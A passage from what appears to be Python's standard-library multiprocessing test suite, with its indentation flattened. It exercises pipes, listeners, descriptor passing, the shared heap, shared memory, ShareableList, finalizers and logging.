self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def _new_shm_name(self, prefix):
# Add a PID to the name of a POSIX shared memory object to allow
# running multiprocessing tests (test_multiprocessing_fork,
# test_multiprocessing_spawn, etc) in parallel.
return prefix + str(os.getpid())
@unittest.skipIf(sys.platform == "win32", "test is broken on Windows")
def test_shared_memory_basics(self):
name_tsmb = self._new_shm_name('test01_tsmb')
sms = shared_memory.SharedMemory(name_tsmb, create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, name_tsmb)
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory(name_tsmb)
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory(name_tsmb, size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = [self._new_shm_name('test01_fn'), self._new_shm_name('test02_fn')]
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
name_dblunlink = self._new_shm_name('test01_dblunlink')
sms_uno = shared_memory.SharedMemory(
name_dblunlink,
create=True,
size=5000
)
with self.assertRaises(FileNotFoundError):
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory(name_dblunlink)
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
name_tsmb,
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory(name_tsmb)
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
name_duplicate = self._new_shm_name('test03_duplicate')
sl_copy = shared_memory.ShareableList(sl, name=name_duplicate)
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual(name_duplicate, sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# Without this line it was raising warnings like:
# UserWarning: resource_tracker:
# There appear to be 1 leaked shared_memory
# objects to clean up at shutdown
# See: https://bugs.python.org/issue45209
resource_tracker.unregister(f"/{name}", "shared_memory")
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
gc.collect() # For PyPy or other GCs.
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
gc.collect() # For PyPy or other GCs.
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
gc.collect() # For PyPy or other GCs.
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
